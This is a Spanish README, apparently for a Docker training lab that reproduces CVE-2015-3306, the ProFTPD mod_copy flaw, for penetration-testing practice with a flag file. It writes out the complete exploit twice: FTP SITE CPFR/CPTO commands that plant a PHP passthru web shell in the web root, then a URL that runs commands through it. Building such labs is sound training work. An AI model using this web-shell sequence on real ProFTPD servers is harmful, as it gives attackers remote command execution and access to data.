
CVE-2015-3306 - ProFTPD - RCE Configuración de Laboratorio Casero (Docker) fácil de usar para Red Teaming o Pruebas de Penetración
Este laboratorio está diseñado para simular la vulnerabilidad CVE-2015-3306 — ProFTPD mod_copy Remote File Copy to RCE
Se utiliza para aprender Web Shell Injection RCE a través del módulo mod_copy de ProFTPD
mod_copy completamente habilitado (SITE CPFR / SITE CPTO)/var/www/htmlflag_RANDOM.txt cada vez que se inicia el contenedor/etc/proftpd/proftpd.conf
/usr/local/proftpd/
/var/www/html/
/tmp/flag_xxx.txt
/entrypoint.sh
docker build -t sentinel7-proftpd-lab .
docker run -it --rm -p 21:21 -p 80:80 sentinel7-proftpd-lab
nc <IP> 21
SITE CPFR /proc/self/cmdline
SITE CPTO /tmp/<?php echo passthru($_GET['cmd']); ?>
SITE CPFR /tmp/<?php echo passthru($_GET['cmd']); ?>
SITE CPTO /var/www/html/webshell.php
Abrir en el navegador:
http://<IP>/webshell.php?cmd=<comando>
Almacenada en:
/tmp/flag_RANDOM.txt
Este laboratorio simula CVE-2015-3306 usando ProFTPD 1.3.5 con mod_copy, permitiendo a los atacantes realizar ProFTPD mod_copy Remote File Copy to RCE.
mod_copy habilitado (SITE CPFR + SITE CPTO)flag_RANDOM.txt al iniciar el contenedornc <IP> 21
SITE CPFR /proc/self/cmdline
SITE CPTO /tmp/<?php echo passthru($_GET['cmd']); ?>
SITE CPFR /tmp/<?php echo passthru($_GET['cmd']); ?>
SITE CPTO /var/www/html/webshell.php
Luego ejecuta:
http://<IP>/webshell.php?cmd=<comando>
/tmp/flag_RANDOM.txt
Solo con fines educativos y pruebas de penetración autorizadas.